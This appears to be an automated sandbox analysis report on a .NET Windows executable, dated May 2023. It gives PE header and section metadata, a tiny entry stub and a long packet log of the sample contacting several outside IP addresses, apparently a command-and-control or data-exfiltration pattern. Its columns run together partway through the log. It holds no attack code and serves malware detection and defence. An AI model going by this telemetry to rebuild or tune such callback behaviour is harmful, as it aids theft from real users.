                                                                                      Time Stamp:0x646AB595 [Mon May 22 00:21:41 2023 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:4
                                                                                      OS Version Minor:0
                                                                                      File Version Major:4
                                                                                      File Version Minor:0
                                                                                      Subsystem Version Major:4
                                                                                      Subsystem Version Minor:0
                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
(the line above is repeated 79 times in the original listing: it is the disassembly of the zero-filled padding that follows the six-byte entry stub, not code that ever executes)
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x211c79         0x4a          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x212000         0x57a         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x214000         0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity     File Type                                                                            Entropy              Characteristics
.text   0x2000           0x20fcc9      0x20fe00  unknown   unknown             unknown                                                                              unknown              IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0x212000         0x57a         0x600     False     0.4342447916666667  data                                                                                 4.115455088227813    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x214000         0xc           0x200     False     0.044921875         MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "!"  0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name         RVA       Size   Type                                                                              Language  Country
RT_VERSION   0x21205c  0x2f8  data
RT_MANIFEST  0x212390  0x1ea  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators

DLL          Import
mscoree.dll  _CorExeMain
Timestamp                             Source Port  Dest Port  Source IP        Dest IP
May 22, 2023 19:49:52.019051075 CEST  49715        80         192.168.2.5      173.231.16.76
May 22, 2023 19:49:52.168612957 CEST  80           49715      173.231.16.76    192.168.2.5
May 22, 2023 19:49:52.168806076 CEST  49715        80         192.168.2.5      173.231.16.76
May 22, 2023 19:49:52.181873083 CEST  49715        80         192.168.2.5      173.231.16.76
May 22, 2023 19:49:52.331434965 CEST  80           49715      173.231.16.76    192.168.2.5
May 22, 2023 19:49:52.331671953 CEST  80           49715      173.231.16.76    192.168.2.5
May 22, 2023 19:49:52.365051031 CEST  49716        443        192.168.2.5      172.67.69.226
May 22, 2023 19:49:52.365119934 CEST  443          49716      172.67.69.226    192.168.2.5
May 22, 2023 19:49:52.365196943 CEST  49716        443        192.168.2.5      172.67.69.226
May 22, 2023 19:49:52.427274942 CEST  49716        443        192.168.2.5      172.67.69.226
May 22, 2023 19:49:52.427325010 CEST  443          49716      172.67.69.226    192.168.2.5
May 22, 2023 19:49:52.496759892 CEST  443          49716      172.67.69.226    192.168.2.5
May 22, 2023 19:49:52.496951103 CEST  49716        443        192.168.2.5      172.67.69.226
May 22, 2023 19:49:52.513705015 CEST  49716        443        192.168.2.5      172.67.69.226
May 22, 2023 19:49:52.513756037 CEST  443          49716      172.67.69.226    192.168.2.5
May 22, 2023 19:49:52.514293909 CEST  443          49716      172.67.69.226    192.168.2.5
May 22, 2023 19:49:52.553683043 CEST  49715        80         192.168.2.5      173.231.16.76
May 22, 2023 19:49:52.720297098 CEST  443          49716      172.67.69.226    192.168.2.5
May 22, 2023 19:49:52.720386028 CEST  49716        443        192.168.2.5      172.67.69.226
May 22, 2023 19:49:53.982438087 CEST  49716        443        192.168.2.5      172.67.69.226
May 22, 2023 19:49:54.028297901 CEST  443          49716      172.67.69.226    192.168.2.5
May 22, 2023 19:49:54.184036016 CEST  443          49716      172.67.69.226    192.168.2.5
May 22, 2023 19:49:54.184190035 CEST  443          49716      172.67.69.226    192.168.2.5
May 22, 2023 19:49:54.184313059 CEST  49716        443        192.168.2.5      172.67.69.226
May 22, 2023 19:49:54.185683966 CEST  49716        443        192.168.2.5      172.67.69.226
May 22, 2023 19:49:55.058192968 CEST  49715        80         192.168.2.5      173.231.16.76
May 22, 2023 19:49:55.249615908 CEST  80           49715      173.231.16.76    192.168.2.5
May 22, 2023 19:49:56.102094889 CEST  80           49715      173.231.16.76    192.168.2.5
May 22, 2023 19:49:56.158345938 CEST  80           49715      173.231.16.76    192.168.2.5
May 22, 2023 19:49:56.158458948 CEST  49715        80         192.168.2.5      173.231.16.76
May 22, 2023 19:50:26.651664972 CEST  49715        80         192.168.2.5      173.231.16.76
May 22, 2023 19:50:26.801135063 CEST  80           49715      173.231.16.76    192.168.2.5
May 22, 2023 19:50:27.038357973 CEST  80           49715      173.231.16.76    192.168.2.5
May 22, 2023 19:50:27.089585066 CEST  49718        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:27.089659929 CEST  443          49718      149.154.167.220  192.168.2.5
May 22, 2023 19:50:27.089822054 CEST  49718        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:27.090919018 CEST  49718        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:27.090950012 CEST  443          49718      149.154.167.220  192.168.2.5
May 22, 2023 19:50:27.166626930 CEST  443          49718      149.154.167.220  192.168.2.5
May 22, 2023 19:50:27.166776896 CEST  49718        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:27.172636986 CEST  49718        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:27.172663927 CEST  443          49718      149.154.167.220  192.168.2.5
May 22, 2023 19:50:27.173259974 CEST  443          49718      149.154.167.220  192.168.2.5
May 22, 2023 19:50:27.244142056 CEST  49715        80         192.168.2.5      173.231.16.76
May 22, 2023 19:50:27.250535965 CEST  49718        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:27.292294979 CEST  443          49718      149.154.167.220  192.168.2.5
May 22, 2023 19:50:27.405478954 CEST  443          49718      149.154.167.220  192.168.2.5
May 22, 2023 19:50:27.405590057 CEST  443          49718      149.154.167.220  192.168.2.5
May 22, 2023 19:50:27.405684948 CEST  49718        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:27.406388044 CEST  49718        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:27.823539972 CEST  49719        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:27.823584080 CEST  443          49719      149.154.167.220  192.168.2.5
May 22, 2023 19:50:27.823748112 CEST  49719        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:27.831954002 CEST  49719        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:27.831983089 CEST  443          49719      149.154.167.220  192.168.2.5
May 22, 2023 19:50:27.891031027 CEST  443          49719      149.154.167.220  192.168.2.5
May 22, 2023 19:50:27.895554066 CEST  49719        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:27.895572901 CEST  443          49719      149.154.167.220  192.168.2.5
May 22, 2023 19:50:27.896583080 CEST  49715        80         192.168.2.5      173.231.16.76
May 22, 2023 19:50:27.943618059 CEST  443          49719      149.154.167.220  192.168.2.5
May 22, 2023 19:50:27.944219112 CEST  49719        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:27.944251060 CEST  443          49719      149.154.167.220  192.168.2.5
May 22, 2023 19:50:27.944530010 CEST  49719        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:27.944540977 CEST  443          49719      149.154.167.220  192.168.2.5
May 22, 2023 19:50:27.944681883 CEST  49719        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:27.944700956 CEST  443          49719      149.154.167.220  192.168.2.5
May 22, 2023 19:50:27.944762945 CEST  49719        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:27.944770098 CEST  443          49719      149.154.167.220  192.168.2.5
May 22, 2023 19:50:27.944861889 CEST  49719        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:27.944875002 CEST  443          49719      149.154.167.220  192.168.2.5
May 22, 2023 19:50:27.944974899 CEST  49719        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:27.944988012 CEST  443          49719      149.154.167.220  192.168.2.5
May 22, 2023 19:50:27.945101023 CEST  49719        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:27.945113897 CEST  443          49719      149.154.167.220  192.168.2.5
May 22, 2023 19:50:27.945218086 CEST  49719        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:27.945231915 CEST  443          49719      149.154.167.220  192.168.2.5
May 22, 2023 19:50:27.945314884 CEST  49719        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:27.945327997 CEST  443          49719      149.154.167.220  192.168.2.5
May 22, 2023 19:50:27.945405960 CEST  49719        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:27.945419073 CEST  443          49719      149.154.167.220  192.168.2.5
May 22, 2023 19:50:27.945519924 CEST  49719        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:27.945533991 CEST  443          49719      149.154.167.220  192.168.2.5
May 22, 2023 19:50:27.945626020 CEST  49719        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:27.945636988 CEST  443          49719      149.154.167.220  192.168.2.5
May 22, 2023 19:50:27.945725918 CEST  49719        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:27.945739031 CEST  443          49719      149.154.167.220  192.168.2.5
May 22, 2023 19:50:27.945822001 CEST  49719        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:27.945837021 CEST  443          49719      149.154.167.220  192.168.2.5
May 22, 2023 19:50:27.945929050 CEST  49719        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:27.945941925 CEST  443          49719      149.154.167.220  192.168.2.5
May 22, 2023 19:50:27.946026087 CEST  49719        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:27.946042061 CEST  443          49719      149.154.167.220  192.168.2.5
May 22, 2023 19:50:27.946134090 CEST  49719        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:27.946146011 CEST  443          49719      149.154.167.220  192.168.2.5
May 22, 2023 19:50:27.946239948 CEST  49719        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:27.946252108 CEST  443          49719      149.154.167.220  192.168.2.5
May 22, 2023 19:50:27.946337938 CEST  49719        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:27.946353912 CEST  443          49719      149.154.167.220  192.168.2.5
May 22, 2023 19:50:27.946448088 CEST  49719        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:27.946463108 CEST  443          49719      149.154.167.220  192.168.2.5
May 22, 2023 19:50:27.946535110 CEST  49719        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:27.946546078 CEST  443          49719      149.154.167.220  192.168.2.5
May 22, 2023 19:50:27.946641922 CEST  49719        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:27.946654081 CEST  443          49719      149.154.167.220  192.168.2.5
May 22, 2023 19:50:27.946755886 CEST  49719        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:27.946768999 CEST  443          49719      149.154.167.220  192.168.2.5
May 22, 2023 19:50:27.946839094 CEST  49719        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:27.946851015 CEST  443          49719      149.154.167.220  192.168.2.5
May 22, 2023 19:50:27.946948051 CEST  49719        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:27.946959019 CEST  443          49719      149.154.167.220  192.168.2.5
May 22, 2023 19:50:27.947051048 CEST  49719        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:27.947063923 CEST  443          49719      149.154.167.220  192.168.2.5
May 22, 2023 19:50:27.947151899 CEST  49719        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:27.947164059 CEST  443          49719      149.154.167.220  192.168.2.5
May 22, 2023 19:50:27.947271109 CEST  49719        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:27.947283983 CEST  443          49719      149.154.167.220  192.168.2.5
May 22, 2023 19:50:27.947530985 CEST  49719        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:27.947773933 CEST  49719        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:27.947906017 CEST  49719        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:27.948048115 CEST  49719        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:27.948196888 CEST  49719        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:27.988290071 CEST  443          49719      149.154.167.220  192.168.2.5
May 22, 2023 19:50:27.988640070 CEST  49719        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:27.988724947 CEST  49719        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:27.988816023 CEST  49719        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:27.988893986 CEST  49719        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:27.988980055 CEST  49719        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:27.996788025 CEST  443          49719      149.154.167.220  192.168.2.5
May 22, 2023 19:50:27.997392893 CEST  49719        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:27.997438908 CEST  443          49719      149.154.167.220  192.168.2.5
May 22, 2023 19:50:27.997498035 CEST  49719        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:27.997589111 CEST  49719        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:27.997670889 CEST  49719        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:27.997754097 CEST  49719        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:27.997818947 CEST  49719        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:28.023484945 CEST  443          49719      149.154.167.220  192.168.2.5
May 22, 2023 19:50:28.023822069 CEST  49719        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:28.023849964 CEST  443          49719      149.154.167.220  192.168.2.5
May 22, 2023 19:50:28.023978949 CEST  49719        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:28.024000883 CEST  443          49719      149.154.167.220  192.168.2.5
May 22, 2023 19:50:28.024118900 CEST  49719        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:28.024130106 CEST  443          49719      149.154.167.220  192.168.2.5
May 22, 2023 19:50:28.024250031 CEST  49719        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:28.024350882 CEST  49719        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:28.024466038 CEST  49719        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:28.024547100 CEST  49719        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:28.046634912 CEST  80           49715      173.231.16.76    192.168.2.5
May 22, 2023 19:50:28.046750069 CEST  49715        80         192.168.2.5      173.231.16.76
May 22, 2023 19:50:28.048568010 CEST  443          49719      149.154.167.220  192.168.2.5
May 22, 2023 19:50:28.048631907 CEST  49719        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:28.075658083 CEST  443          49719      149.154.167.220  192.168.2.5
May 22, 2023 19:50:28.432652950 CEST  443          49719      149.154.167.220  192.168.2.5
May 22, 2023 19:50:28.432780027 CEST  443          49719      149.154.167.220  192.168.2.5
May 22, 2023 19:50:28.432957888 CEST  49719        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:28.434058905 CEST  49719        443        192.168.2.5      149.154.167.220
May 22, 2023 19:50:34.711292028 CEST  49724        80         192.168.2.5      173.231.16.76
May 22, 2023 19:50:37.745038033 CEST  49724        80         192.168.2.5      173.231.16.76
May 22, 2023 19:50:37.894687891 CEST  80           49724      173.231.16.76    192.168.2.5
May 22, 2023 19:50:37.894788027 CEST  49724        80         192.168.2.5      173.231.16.76
May 22, 2023 19:50:38.269848108 CEST  49724        80         192.168.2.5      173.231.16.76
May 22, 2023 19:50:38.419765949 CEST  80           49724      173.231.16.76    192.168.2.5
May 22, 2023 19:50:38.420283079 CEST  80           49724      173.231.16.76    192.168.2.5
May 22, 2023 19:50:38.461994886 CEST  49725        443        192.168.2.5      172.67.69.226
May 22, 2023 19:50:38.462038040 CEST  443          49725      172.67.69.226    192.168.2.5
May 22, 2023 19:50:38.462110996 CEST  49725        443        192.168.2.5      172.67.69.226
May 22, 2023 19:50:38.477859974 CEST  49725        443        192.168.2.5      172.67.69.226
May 22, 2023 19:50:38.477888107 CEST  443          49725      172.67.69.226    192.168.2.5
May 22, 2023 19:50:38.557627916 CEST  49724        80         192.168.2.5      173.231.16.76
                                                                                      May 22, 2023 19:50:38.780670881 CEST44349725172.67.69.226192.168.2.5
                                                                                      May 22, 2023 19:50:38.780765057 CEST49725443192.168.2.5172.67.69.226
                                                                                      May 22, 2023 19:50:38.784622908 CEST49725443192.168.2.5172.67.69.226
                                                                                      May 22, 2023 19:50:38.784651041 CEST44349725172.67.69.226192.168.2.5
                                                                                      May 22, 2023 19:50:38.785032034 CEST44349725172.67.69.226192.168.2.5
                                                                                      May 22, 2023 19:50:38.854499102 CEST49725443192.168.2.5172.67.69.226
                                                                                      May 22, 2023 19:50:46.234462976 CEST49725443192.168.2.5172.67.69.226
                                                                                      May 22, 2023 19:50:46.276293039 CEST44349725172.67.69.226192.168.2.5
                                                                                      May 22, 2023 19:50:46.435561895 CEST44349725172.67.69.226192.168.2.5
                                                                                      May 22, 2023 19:50:46.435781956 CEST44349725172.67.69.226192.168.2.5
                                                                                      May 22, 2023 19:50:46.435862064 CEST49725443192.168.2.5172.67.69.226
                                                                                      May 22, 2023 19:50:46.436676025 CEST49725443192.168.2.5172.67.69.226
                                                                                      May 22, 2023 19:50:46.786431074 CEST4972480192.168.2.5173.231.16.76
                                                                                      May 22, 2023 19:50:46.941960096 CEST8049724173.231.16.76192.168.2.5
                                                                                      May 22, 2023 19:50:47.058326960 CEST4972480192.168.2.5173.231.16.76
                                                                                      May 22, 2023 19:51:33.346762896 CEST4972480192.168.2.5173.231.16.76
                                                                                      May 22, 2023 19:51:33.540015936 CEST8049724173.231.16.76192.168.2.5
                                                                                      May 22, 2023 19:51:34.213435888 CEST8049724173.231.16.76192.168.2.5
                                                                                      May 22, 2023 19:51:34.360059023 CEST4972480192.168.2.5173.231.16.76
                                                                                      May 22, 2023 19:51:34.362384081 CEST8049724173.231.16.76192.168.2.5
                                                                                      May 22, 2023 19:51:34.421899080 CEST49726443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:34.421977997 CEST44349726149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:34.422117949 CEST49726443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:34.422976971 CEST49726443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:34.423011065 CEST44349726149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:34.493760109 CEST44349726149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:34.494033098 CEST49726443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:34.497045994 CEST49726443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:34.497091055 CEST44349726149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:34.497454882 CEST44349726149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:34.499669075 CEST49726443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:34.544313908 CEST44349726149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:34.550889015 CEST4972480192.168.2.5173.231.16.76
                                                                                      May 22, 2023 19:51:34.618011951 CEST44349726149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:34.618119955 CEST44349726149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:34.618231058 CEST49726443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:34.619126081 CEST49726443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:34.675589085 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:34.675658941 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:34.676084995 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:34.684134007 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:34.684169054 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:34.750828028 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:34.847636938 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.151938915 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.152106047 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.152426958 CEST4972480192.168.2.5173.231.16.76
                                                                                      May 22, 2023 19:51:45.197909117 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.198843002 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.198883057 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.200066090 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.200086117 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.200172901 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.200191975 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.200257063 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.200268030 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.210390091 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.210442066 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.210944891 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.210968971 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.210988045 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.210999012 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.211039066 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.211052895 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.211070061 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.211080074 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.211179018 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.211190939 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.212343931 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.212372065 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.212418079 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.212438107 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.218646049 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.218678951 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.220691919 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.220726013 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.220820904 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.220844984 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.221981049 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.222012997 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.222058058 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.222081900 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.234966040 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.235012054 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.235053062 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.235074997 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.235100985 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.235121012 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.235157013 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.235193968 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.235224009 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.235248089 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.235270023 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.235291004 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.235316038 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.235332012 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.236108065 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.236139059 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.237133980 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.237170935 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.237276077 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.237293959 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.237324953 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.237338066 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.241898060 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.241924047 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.242072105 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.242085934 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.242182970 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.242198944 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.242273092 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.242289066 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.242374897 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.242389917 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.243043900 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.243232965 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.243366003 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.243485928 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.243591070 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.244754076 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.244951010 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.252923012 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.253055096 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.296322107 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.300129890 CEST8049724173.231.16.76192.168.2.5
                                                                                      May 22, 2023 19:51:45.300236940 CEST4972480192.168.2.5173.231.16.76
                                                                                      May 22, 2023 19:51:45.849107981 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.849301100 CEST44349727149.154.167.220192.168.2.5
                                                                                      May 22, 2023 19:51:45.849427938 CEST49727443192.168.2.5149.154.167.220
                                                                                      May 22, 2023 19:51:45.855576038 CEST49727443192.168.2.5149.154.167.220
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      May 22, 2023 19:49:51.921468019 CEST6145253192.168.2.58.8.8.8
                                                                                      May 22, 2023 19:49:51.942271948 CEST53614528.8.8.8192.168.2.5
